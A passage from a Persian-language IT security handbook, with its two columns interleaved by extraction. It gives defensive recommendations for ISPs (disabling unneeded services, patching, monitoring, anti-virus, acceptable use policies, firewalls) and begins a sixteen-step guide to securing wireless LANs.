‫ﺩﻳﮕﺮ(؛ ﻭ ﺭﻭﻧﺪﻫﺎﻱ ﮔﺰﺍﺭﺵﺩﻫﻲ ﻫﻨﮕﺎﻡ ﻭﻗﻮﻉ ﻳﻚ ﺣﻤﻠـﺔ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢١٠‬‬

‫ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻴـﺪ ﻛـﻪ ﻫﻤـﺔ ﺧـﺪﻣﺎﺕ ﻏﻴﺮﺿـﺮﻭﺭﻱ )ﻣﺜـﻞ‬ ‫•‬ ‫ﺍﻣﻨﻴﺘﻲ )ﮔﺰﺍﺭﺵ ﺑﻪ ﻋﻮﺍﻣﻞ ﺩﺍﺧﻠـﻲ ﺳـﺎﺯﻣﺎﻥ‪ ،‬ﺑـﻪ ‪ISP‬ﻫـﺎ‪ ،‬ﻭ ﻧﻴـﺰ‬
‫‪ ،ftp ،icq ،finger‬ﻛﺎﻣﭙﺎﻳﻠﺮﻫـﺎ ﻭ ‪ (...‬ﺭﻭﻱ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﻗﺎﺑـﻞ‬ ‫ﻣﻘﺎﻣﺎﺕ ﻣﺴﺌﻮﻝ(‬
‫ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﻏﻴﺮﻓﻌﺎﻝ ﺷﺪﻩﺍﻧﺪ‪.‬‬ ‫ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺧـﻮﺩ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻛﻨﻴـﺪ )ﺁﻳـﺎ ﺗﻨﻬـﺎ‬ ‫•‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻫﻤﺔ ﺩﺳـﺘﮕﺎﻫﻬﺎ ‪ -‬ﺧـﺼﻮﺻﹰﺎ ﺁﻧﻬـﺎﻳﻲ‬ ‫•‬ ‫ﻣﺴﺌﻮﻟﻴﺖ ﺣﻔﻆ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺷﻤﺎﺳﺖ‪ ،‬ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﺍ ﺗﺎ ﭼﻪ ﻣﺪﺕ‬
‫ﻛــﻪ ﻗﺎﺑــﻞ ﺍﺗــﺼﺎﻝ ﺑــﻪ ﺍﻳﻨﺘﺮﻧــﺖ ﻫــﺴﺘﻨﺪ ‪ -‬ﺑــﺎ ﺍﻋﻤــﺎﻝ‬ ‫ﺑﺎﻳﺪ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ‪ ،‬ﻭ ‪.(...‬‬
‫ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻪ ﻣﻲﺷﻮﻧﺪ‪.‬‬ ‫ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺗﺪﻭﻳﻦ ﻛﻨﻴﺪ ﺩﺭ ﺧﺼﻮﺹ ﭼﮕﻮﻧﮕﻲ ﻭﺍﻛـﻨﺶ‬ ‫•‬
‫ﻳﻚ ﺳﻴﺴﺘﻢ ﻛﻨﺘﺮﻝ ﻣﺪﺍﻭﻡ ﺷﺒﻜﻪ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﺗـﺎ ﺑﺘﻮﺍﻧﻴـﺪ‬ ‫•‬ ‫ﺑﻪ ﻫﺸﺪﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﻣﺸﺘﺮﻳﺎﻥ‪ISP ،‬ﻫـﺎﻱ‬
‫ﻣــﺸﻜﻼﺗﻲ ﺍﺯ ﻗﺒﻴــﻞ ﺣﻤــﻼﺕ ﺗﺨﺮﻳــﺐ ﺳــﺮﻭﻳﺲ ﻭ‬ ‫ﻫﻤﺘﺎ‪ ،‬ﺍﺭﺍﺋﻪ ﺩﻫﻨﺪﮔﺎﻥ ﻋﻤﺪﺓ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ‪ ،‬ﻭ ﺳﺎﻳﺮ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻋﻤﺪﺓ ﻭﻳﺮﻭﺳـﻬﺎ ﻭ ﻫﺮﺯﻧﺎﻣـﻪﻫـﺎ ﺭﺍ ﺗـﺸﺨﻴﺺ‬ ‫ﺍﻳﻨﺘﺮﻧﺖ‪.‬‬
‫ﺩﻫﻴﺪ‪ .‬ﺍﻳﻦ ﻧﻴﺎﺯﻣﻨﺪ ﺁﻥ ﺍﺳﺖ ﻛـﻪ ﻗـﺎﺩﺭ ﺑﺎﺷـﻴﺪ ﺍﻟﮕﻮﻫـﺎﻱ‬ ‫ﺁﮔﺎﻩ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺸﺘﺮﻳﺎﻥ ﺧﺪﻣﺎﺕ ﺷـﻤﺎ ﺑـﻪ‬ ‫•‬
‫ﻃﺒﻴﻌﻲ ﺗﺮﺍﻓﻴﻚ ﺷﺒﻜﺔ ﺧﻮﺩ ﺭﺍ ﺩﺭﻙ ﻛﻨﻴﺪ‪.‬‬ ‫ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺑﻴﺮﻭﻧــﻲ ﺣﻤﻠــﻪ ﻛﻨﻨــﺪ‪ .‬ﻣــﻲﺗﻮﺍﻧﻴــﺪ ﺑــﺮﺍﻱ‬
‫ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻗﺎﺑﻠﻴﺖ ﻛﻨﺘﺮﻝ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﺗﺎ ﺑﻬﺘﺮ ﺑﺘﻮﺍﻧﻴـﺪ‬ ‫•‬ ‫ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﮔﺰﺍﺭﺷﺎﺕ ﺳﺎﻳﺮ ‪ISP‬ﻫﺎ ﻣﺒﻨﻲ ﺑـﺮ ﺩﺳـﺖ‬
‫ﻣﻬﺎﺟﻤﺎﻥ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ )ﻣﺎﺷﻴﻨﻬﺎﻱ ﻣﻴﺰﺑﺎﻥ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ‬ ‫ﺩﺍﺷﺘﻦ ﻣﺸﺘﺮﻳﺎﻥ ﺷﻤﺎ ﺩﺭ ﺣﻤﻼﺕ‪ ،‬ﻳﻚ ﺳﻴﺎﺳﺖ ﺗـﺪﻭﻳﻦ‬
‫ﻭ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﻓﺮﺍﻣﻮﺵ ﻧﻜﻨﻴﺪ(‪.‬‬ ‫ﻧﻤﺎﻳﻴﺪ‪.‬‬

‫ﻭﻳﺮﻭﺱﻳﺎﺏﻫﺎ ﺭﺍ ﺩﺭ ﻫﺮ ﺟﺎﻳﻲ ﻛﻪ ﻭﺭﻭﺩ ﻳﺎ ﺧﺮﻭﺝ ﭘـﺴﺖ‬ ‫•‬ ‫ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺩﺭ ﺳﻄﺢ ‪ ISP‬ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻭﻳﺮﻭﺱﻳﺎﺏ‬ ‫•‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ ﻧﺼﺐ ﻛﻨﻴﺪ‪.‬‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳـﺖ ﺗـﺼﻤﻴﻢ ﺑﮕﻴﺮﻳـﺪ ﺑـﺮﺍﻱ‬
‫ﻓﺮﺳﺘﻨﺪﺓ ﻧﺎﻣﻪﻫﺎﻱ ﺁﻟﻮﺩﻩ ﻫـﺸﺪﺍﺭﻫﺎﻳﻲ ﻣﺒﻨـﻲ ﺑـﺮ "ﻋـﺪﻡ‬
‫ﺑﺎ ﺗﻬﻴﻪ ﺿﺪﻭﻳﺮﻭﺳﻬﺎﻱ ﺭﺍﻳﮕﺎﻥ ﻳﺎ ﺍﺭﺯﺍﻥﻗﻴﻤﺖ‪ ،‬ﻣـﺸﺘﺮﻳﺎﻥ‬ ‫•‬
‫ﺍﻧﺘﻘﺎﻝ ﻧﺎﻣﻪ ﺑﺪﻟﻴﻞ ﺁﻟﻮﺩﮔﻲ ﺑﻪ ﻭﻳﺮﻭﺱ" ﺍﺭﺳﺎﻝ ﻛﻨﻴﺪ‪.‬‬
‫ﺧﻮﺩ ﺭﺍ ﺗﺮﻏﻴﺐ ﻛﻨﻴﺪ ﻛﻪ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩ ﺭﺍ ﺍﻳﻤﻦ ﺳﺎﺯﻧﺪ‪.‬‬
‫ﻳﻚ ﺳﻴﺎﺳﺖ ﻛﺎﺭﺑﺮﺩ ﻣﺠﺎﺯ )‪ ٢٠٦(AUP‬ﺗﺪﻭﻳﻦ ﻛﻨﻴـﺪ ﻛـﻪ‬ ‫•‬
‫ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ‬ ‫•‬
‫ﺷﺎﻣﻞ ﻭﻇـﺎﻳﻒ ﻣﺘﻘﺎﺑـﻞ ‪ ISP‬ﻭ ﻣـﺸﺘﺮﻳﺎﻥ ﺑﺎﺷـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﻳﻚ ﺗﻮﺯﻳﻊﻛﻨﻨﺪﺓ ﻫﺮﺯﻧﺎﻣﻪ ﺗﺒﺪﻳﻞ ﻧﺸﻮﺩ‪.‬‬
‫ﺳﻴﺎﺳﺖ ﺑﺎﻳﺪ ﺩﺭ ﺗﻤﺎﻡ ﻗﺮﺍﺭﺩﺍﺩﻫﺎﻱ ﻣﺸﺘﺮﻱ ﻣـﻮﺭﺩ ﺍﺷـﺎﺭﻩ‬
‫ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻛﻨﺘﺮﻝ ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﻧﺼﺐ ﻛﻨﻴﺪ‪.‬‬ ‫•‬ ‫ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪.‬‬
‫ﻛﻠﻴﺔ ﺩﺳﺘﺮﺳﻴﻬﺎ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻭ ﺑﺮﻗﺮﺍﺭﻱ ﻭ ﻗﻄـﻊ‬ ‫•‬ ‫ﺷﺒﻜﻪ ﺭﺍ ﺑﮕﻮﻧـﻪﺍﻱ ﻃﺮﺍﺣـﻲ ﻛﻨﻴـﺪ ﻛـﻪ ﺗـﺎ ﺣـﺪ ﺍﻣﻜـﺎﻥ‬ ‫•‬
‫ﺍﺗﺼﺎﻝ ﺑﻪ ﺷﺒﻜﻪ ﺭﺍ ﺛﺒﺖ ﻛﻨﻴـﺪ ﺗـﺎ ﺗﻮﺍﻧـﺎﻳﻲ ﺧـﻮﺩ ﺑـﺮﺍﻱ‬ ‫ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﻋﻤﻠﻲ ﺑﺎﺷﺪ‪ .‬ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺷﺒﻜﺔ ﺷـﻤﺎ ﺭﺍ‬
‫ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ ﻗﺎﻧﻮﻧﻲ ﻋﻠﻴـﻪ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺭﺍ ﺍﻓـﺰﺍﻳﺶ‬ ‫ﻛﻨﺘﺮﻝ ﻭ ﺍﺩﺍﺭﻩ ﻣﻲﻛﻨﻨﺪ )ﺍﺯ ﺟﻤﻠﻪ ﺳﻴـﺴﺘﻢ ﻣﻴﺰﺑـﺎﻥ ﺣـﺴﺎﺑﻬﺎﻱ‬
‫ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ‪.‬‬ ‫ﻛـﺎﺭﺑﺮﻱ( ﺑﺎﻳﺪ ﺑﻮﺳﻴﻠﺔ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺠﺰﺍ ﺷـﺪﻩ‬
‫ﺍﺯ ﺭﻭﺍﻟﻬﺎﻱ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺧـﻮﺩ ﻭ ﻛـﺎﺭﺑﺮﺍﻥ‬ ‫•‬ ‫ﺑﺎﺷﻨﺪ‪.‬‬
‫ﻣﺠﻤﻮﻋﻪﺍﻱ ﺳﺨﺘﮕﻴﺮﺍﻧﻪ ﻭ ﻫﻤﭙﻮﺷﺎﻥ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ‪.‬‬ ‫ﺍﻃﻤﻴﻨﺎﻥ ﭘﻴﺪﺍ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺗﻤـﺎﻡ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺑﺨـﺶ‬ ‫•‬

‫ﻭﺻـــﻠﻪﻫـــﺎﻱ ﺍﻣﻨﻴﺘـــﻲ ﺭﺍ ‪ download‬ﻭ ﺍﺯ ﻃﺮﻳـــﻖ‬ ‫•‬ ‫ﻣﺪﻳﺮﻳﺖ‪ ،‬ﺑﺨﺶ ﺧﺪﻣﺎﺕ )ﻣﺜـﻞ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﭘـﺴﺖ‬

‫ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﻭ ﻳﺎ ﺷﺒﻜﺔ ﺗﻮﺯﻳﻊ ﻣﺤﻠﻲ‪ ،‬ﺗﻮﺯﻳﻊ ﻛﻨﻴﺪ‪.‬‬ ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ‪ ،‬ﻭﺏ‪ ،‬ﺗــﺼﺪﻳﻖ ﻫﻮﻳــﺖ‪ Proxy ،‬ﻭ ‪ (DNS‬ﻭ ﺗﻤــﺎﻡ‬
‫ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻜﻪ ﺑﻪﺭﻭﺯ ﺑﻮﺩﻥ ﻭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺭﺍ‬ ‫ﺗﺠﻬﻴﺰﺍﺕ ﻣﺴﻴﺮﻳﺎﺑﻲ ﻭ ﻛﻨﺘﺮﻟﻲ ﺷﺒﻜﻪ ﺍﺯ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ‬
‫ﺑﺮﺍﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺗﺴﻬﻴﻞ ﻛﺮﺩﻩﺍﻳﺪ‪ ،‬ﭘﻬﻨـﺎﻱ ﺑﺎﻧـﺪ ﻣـﺼﺮﻓﻲ‬ ‫ﻣــﺴﺘﺤﻜﻢ ﻭ ﻗــﻮﺍﻧﻴﻦ ﺩﺳﺘﺮﺳــﻲ ﻣﺤﺪﻭﺩﺷــﺪﻩ ﺍﺳــﺘﻔﺎﺩﻩ‬
‫ﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﻛﺎﻫﺶ ﺩﺍﺩﻩﺍﻳﺪ‪.‬‬ ‫ﻣﻲﻛﻨﻴﺪ‪.‬‬

‫‪206 Acceptable Use Policy‬‬


‫‪٢١١‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﭘﻴﺶ ﻓﺮﺽ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﺭﺍ ﻣـﻲ ﺩﺍﻧﻨـﺪ ﻭ ﺍﺑﺘـﺪﺍ ﺁﻧﻬـﺎ ﺭﺍ‬ ‫ﺷﺎﻧﺰﺩﻩ ﮔﺎﻡ ﺑﺮﺍﻱ ﺍﻳﻤﻦﺳﺎﺯﻱ ‪WLAN‬‬
‫ﻣﻮﺭﺩ ﺁﺯﻣﺎﻳﺶ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺑﺴﻴﺎﺭ ﺷﺒﻴﻪ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜـﻲ ﺩﺭﺏ ﻭﺭﻭﺩﻱ‬
‫ﭘﻮﺷﺶ ﺷﺒﻜﺔ ﺑـﻲﺳـﻴﻢ ﺭﺍ ﺣـﺪﺍﻛﺜﺮ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ ﻭﺳـﻌﺖ‬ ‫‪.۷‬‬ ‫ﻳﻚ ﺳﺎﺧﺘﻤﺎﻥ ﺍﺳﺖ‪ :‬ﻫﺮ ﻛﺴﻲ ﺑﺎ ﺍﻧﮕﻴﺰﻩ‪ ،‬ﺑﻮﺩﺟﻪ‪ ،‬ﻣﻨﺎﺑﻊ‪ ،‬ﻭ ﺯﻣﺎﻥ‬
‫ﺳﺎﺧﺘﻤﺎﻥ ﺧﻮﺩ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ ﻭ ﻧﻪ ﺑﻴـﺸﺘﺮ‪ .‬ﻫﻤﻴﻨﻄـﻮﺭ ﻛـﻪ‬ ‫ﻛﺎﻓﻲ ﻗﺎﺩﺭ ﺍﺳﺖ ﺁﻧﺮﺍ ﺧﺪﺷﻪﺩﺍﺭ ﻛﻨﺪ‪ .‬ﺑﺎ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺑﺎﻳﺪ ﻣﺜـﻞ‬
‫ﺍﺩﺍﺭﺓ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻣﺤﻠﻲ ﻣﻨﺎﺳﺐ ﺟﻬـﺖ ﺍﺳـﺘﻘﺮﺍﺭ‬ ‫ﻳﻚ ﺷﺒﻜﺔ ﻫﻤﮕﺎﻧﻲ ﻭ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺱ ﺑﺮﺍﻱ ﻋﻤـﻮﻡ ﺭﻓﺘـﺎﺭ ﻛـﺮﺩ‪.‬‬
‫ﻧﻘﻄﺔ ﺗﻤﺎﺱ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺩﺭﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ‬ ‫ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﻧﺒﺎﻳﺪ ﺗﺼﻮﺭ ﻛﻨﺪ ﻛﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻧﺘﻘﺎﻟﻲ‬
‫ﻣﺤﻞ ﺁﻧﺮﺍ ﺩﺭ ﺟﺎﻳﻲ ﻣﺘﻤﺎﻳﻞ ﺑﻪ ﻣﺮﻛﺰ ﺳﺎﺧﺘﻤﺎﻥ ﺑﺮﮔﺰﻳﻨﻴﺪ؛‬ ‫ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ‪ ،‬ﺧﺼﻮﺻﻲ ﻭ ﺍﻣﻦ ﺍﺳﺖ‪ .‬ﺗﻮﺻﻴﻪﻫﺎﻱ ﺍﻳﻤﻨـﻲ ﺯﻳـﺮ‬
‫ﭼﺮﺍﻛﻪ ﺍﮔﺮ ﺁﻧﺮﺍ ﻧﺰﺩﻳﻚ ﭘﻨﺠﺮﻩﻫﺎ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ‬ ‫ﻛﻪ ﺑﺮﮔﺮﻓﺘﻪ ﺍﺯ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﻭ ﺗﻮﺻﻴﻪﻫﺎﻱ ﭘﻴﺸﮕﺎﻣﺎﻥ ﺍﻳﻦ ﺻﻨﻌﺖ‬
‫ﺳﻴﮕﻨﺎﻟﻬﺎﻱ ﻗﻮﻳﺘﺮﻱ ﺑﻪ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻥ ﺗﺸﻌﺸﻊ ﻳﺎﺑﻨﺪ‬ ‫ﺍﺳﺖ‪ ،‬ﻧﻜـﺎﺕ ﺳـﺎﺩﻩﺍﻱ ﺑـﺮﺍﻱ ﺍﻳﺠـﺎﺩ ﻳـﻚ ﺯﻳﺮﺳـﺎﺧﺖ ﺟﻬـﺖ‬
‫ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺩﻳﮕﺮﺍﻥ ﺷﺒﻜﺔ ﺷﻤﺎ ﺭﺍ ﺁﺳﺎﻧﺘﺮ ﭘﻴﺪﺍ ﻛﻨﻨﺪ‪.‬‬ ‫ﺍﻳﻤﻦﺳﺎﺯﻱ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ‪:‬‬
‫ﺑﺮﺍﻱ ﺑﺨﺸﻬﺎﻱ ﺑﻲ ﺳﻴﻢ‪ ،‬ﺁﻧﺘﻨﻬﺎﻱ ﺟﻬﺘـﺪﺍﺭ ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ‪.‬‬ ‫‪.۸‬‬ ‫ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﺩﺭ ﺳﻄﺢ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺑـﻲ ﺳـﻴﻢ‬ ‫‪.۱‬‬
‫ﺑﻴــﺸﺘﺮ ﺩﺳــﺘﮕﺎﻫﻬﺎﻱ ﺑــﻲﺳــﻴﻢ ﺍﺯ ﺁﻧﺘﻨﻬــﺎﻱ ﭼﻨــﺪﺟﻬﺘﻲ‬ ‫ﺗﻬﻴﻪ ﻛﻨﻴﺪ‪ .‬ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺳـﺎﺯﻣﺎﻥ ﻭ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﭼﻨـﻴﻦ ﺁﻧﺘﻨﻬـﺎﻳﻲ ﺑـﻪ ﻣﻬـﺎﺟﻢ ﺍﻣﻜـﺎﻥ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﺒﻜﻪ ﺭﺍ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ ﻛﻪ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺿﺒﻂ ﻛﻠﻴﺔ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺍﻳﻦ ﺩﺭﺣﺎﻟﻲ ﺍﺳﺖ ﻛـﻪ‬ ‫ﺳﺎﺯﮔﺎﺭ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺁﻧﺘﻨﻬﺎﻱ ﺟﻬﺘﺪﺍﺭ ﺍﮔﺮ ﺩﺭ ﻓﺮﻛﺎﻧﺴﻲ ﺣﺪﻭﺩ ‪ ۲،۴‬ﮔﻴﮕـﺎﻫﺮﺗﺰ‬
‫ﺑﺮﺭﺳﻲ ﻛﻨﻴـﺪ ﻛـﻪ ﭼﻨـﺪ ﻧﻔـﺮ ﺍﺯ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺩﺭ ﻣﻨـﺰﻝ ﺍﺯ‬ ‫‪.۲‬‬
‫ﻳﺎ ﺑﺎﻻﺗﺮ ﻛﺎﺭ ﻛﻨﻨﺪ‪ ،‬ﮔﺴﺘﺮﺓ ﺍﻧﺘﺸﺎﺭ ﺳﻴﮕﻨﺎﻝ ﺑـﺴﻴﺎﺭ ﻛﻤﺘـﺮ‬
‫‪ WLAN‬ﺳﺎﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﻳـﻦ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍﻩ‬
‫ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪.‬‬
‫ﺩﻭﺭ ﺑﺎﻳﺪ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺑﺎﺷـﻨﺪ ﺗـﺎ ﺑﺘـﻮﺍﻥ ﻧﻘـﺎﻁ ﺗﻤـﺎﺱ‬
‫‪ WEP‬ﺭﺍ ﻓﻌﺎﻝ ﻛﻨﻴﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻨﻜـﺎﺭ ﻛﻠﻴـﺪ ﭘـﻴﺶﻓـﺮﺽ‬ ‫‪.۹‬‬ ‫ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺷﺒﻜﻪ ﺭﺍ ﻣﺴﺪﻭﺩ ﻛﺮﺩ‪.‬‬
‫‪ WEP‬ﺭﺍ ﺗﻐﻴﻴــﺮ ﺩﻫﻴــﺪ ﻭ ﺑﻌــﺪ ﺍﺯ ﺁﻥ ﺑــﺼﻮﺭﺕ ﻫﻔﺘﮕــﻲ‬
‫‪٢٠٧‬‬ ‫ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﺣﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ‪ ،‬ﻳـﻚ ﻓﺮﺁﻳﻨـﺪ ﺗﻬﻴـﻪ‬ ‫‪.۳‬‬
‫ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺗﻜﺮﺍﺭ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻛﻨﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻥ ﺑﺼﻮﺭﺕ ﺍﻣﻦ ﺁﻧﻬﺎ ﺭﺍ ﻣﺪﻳﺮﻳﺖ ﻛﺮﺩ‪.‬‬
‫ﻣﻴﺎﻥ ﺩﻳﻮﺍﺭﺓ ﺁﺗـﺶ ﻭ ﺷـﺒﻜﺔ ﺑـﻲﺳـﻴﻢ‪ ،‬ﺍﺯ ﺗﻮﻧـﻞ ‪VPN‬‬ ‫‪.۱۰‬‬
‫ﺧﺪﻣﺎﺕ ﻏﻴﺮﺿﺮﻭﺭﻱ ﺭﺍ ﺭﻭﻱ ﺗﻤﺎﻡ ﺳﺮﻭﻳﺲ ﺩﻫﻨـﺪﻩﻫـﺎ ﻭ‬ ‫‪.۴‬‬
‫ﺍﺳــﺘﻔﺎﺩﻩ ﻛﻨﻴــﺪ‪ .‬ﺍﮔﺮﭼــﻪ ﺍﻳــﻦ ﺍﻣــﺮ ﻣــﺴﺘﻠﺰﻡ ﺭﺍﻩﺍﻧــﺪﺍﺯﻱ‬
‫ﻻ ﻛﻠﻴـﺔ ﺧـﺪﻣﺎﺕ‬ ‫ﺳﺮﻭﻳﺲ ﮔﻴﺮﻧﺪﻩ ﻫﺎ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‪ .‬ﺍﺻﻮ ﹰ‬
‫ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ ‪ VPN‬ﻣﻲﺑﺎﺷـﺪ‪ ،‬ﺍﻣـﺎ ﺩﺭ ﻃـﺮﻑ ﺩﻳﮕـﺮ‪،‬‬
‫ﻧﺎﺷﻨﺎﺧﺘﻪ ﻳﺎ ﺑﻲﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﻳﺪ ﻏﻴﺮﻓﻌﺎﻝ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺳﺮﻭﻳﺲ ﮔﻴﺮﻧﺪﺓ ‪ VPN‬ﺩﺭ ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ‬
‫ﻣﺜـﻞ ‪ ،Windows 2000 ،Windows 98 SE‬ﻭ‬ ‫ﺗﻨﻈﻴﻤﺎﺕ ﭘﻴﺶﻓﺮﺽ ﻣﺤﺼﻮﻻﺕ ﺧـﻮﺩ ﺭﺍ ﺗﻐﻴﻴـﺮ ﺩﻫﻴـﺪ‪.‬‬ ‫‪.۵‬‬
